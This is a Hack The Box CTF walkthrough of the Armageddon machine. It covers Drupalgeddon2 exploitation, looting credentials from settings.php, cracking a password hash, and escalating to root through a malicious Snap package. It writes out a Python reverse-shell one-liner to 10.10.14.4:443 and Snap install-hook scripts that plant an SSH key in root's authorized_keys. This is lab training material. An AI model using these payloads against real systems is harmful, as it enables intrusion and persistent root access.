CTF Walkthroughs, Hack The Box

Hack The Box – Armageddon Walkthrough

July 27, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was a very easy Linux machine that required to exploit the Drupalgeddon2 vulnerability and finding clear-text database credentials in order to gain remote access to the host, and the Snap binary with Sudo permissions enabled to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified two open ports: port 22 (SSH) and port 80 (HTTP), which seems to be running Drupal 7.

Enumerating HTTP

When accessing the site through a browser, it takes to a Drupal login page:

Running Droopescan to determine the exact version of Drupal – it appears to be 7.56

Using SearchSploit to identify known vulnerabilities in this version of Drupal, excluding Metasploit modules with grep:

There appears to be a Ruby script that exploits a vulnerability affecting this version of Drupal, mirroring it locally:

This vulnerability is an iteration of the Drupalgeddon issue, the default configuration of certain versions of Drupal has fields in the new user registration page that were not correctly sanitized, therefore, a specifically crafted AJAX request that can target a variety of form fields can be issued, thus executing the attacker’s code. In this particular instance, the exploit is creating a PHP file on the web server’s root directory and executing commands from it.

Exploiting Drupallgeddon2

Executing the script and providing the URL to the vulnerable Drupal application:

The exploit provides a prompt where system commands can be run, and the response from the web server is returned.

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using a Python reverse shell to gain remote access to the system:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);  os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After doing a bit of research to find out where Drupal stores database credentials, it appears these are stored in the settings.php file:

Identified database credentials in the settings.php file:

Accessing MySQL with the “drupaluser” user and listing the databases:

Found a password hash for the “brucetherealadmin” user in “drupal” database:

It appears this user exists on the machine, so this could have been re-used as a local password:

Adding the hash to a text file in the local Kali machine:

Using John the Ripper with the following flags to crack the previously found hashes:

  • –format to specify the hash type, in this case, NTLM
  • –wordlist to specify the wordlist to be used, in this case, rockyou
  • the text file containing the hashes, one per line

Authenticating as “brucetherealadmin” via SSH:

Privilege Escalation

When executing sudo -l, it appears that the current user can execute /usr/bin/snap install * as root:

Snap is a software packaging and deployment system used in Linux, it works in a similar manner to APT.

Upon consulting GTFOBins, it appears it can be exploited when Sudo permissions are enabled by creating a Snap package containing malicious code, that will be executed when installed.

In order to test this, creating a package that will execute the “id” command when installed

COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n id -s dir -t snap -a all meta

Transferring it to the target host using the Python Simple HTTP Server and Curl:

Upon installing the package, it appears that the id command was executed as root:

Generating an SSH key pair:

Creating a new package that will add the contents of the public key generated above to the root user’s authorized_keys file:


COMMAND='mkdir /root/.ssh;echo "ssh-rsa AAAB3N<SNIPPED>" >> /root/.ssh/authorized_keys
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n ssh -s dir -t snap -a all meta

Transferring it to the target host using the Python Simple HTTP Server and Curl:

Installing the package on the target machine:

Authenticating as root using the private SSH key generated earlier:

Root-level access to the target host has now been obtained.

Conclusion

This was a pretty fun box, the exploitation process was pretty straightforward although still interesting to see how the vulnerability was found and exploited, the privilege escalation part was new to me, though similar to exploiting Yum or other package managers.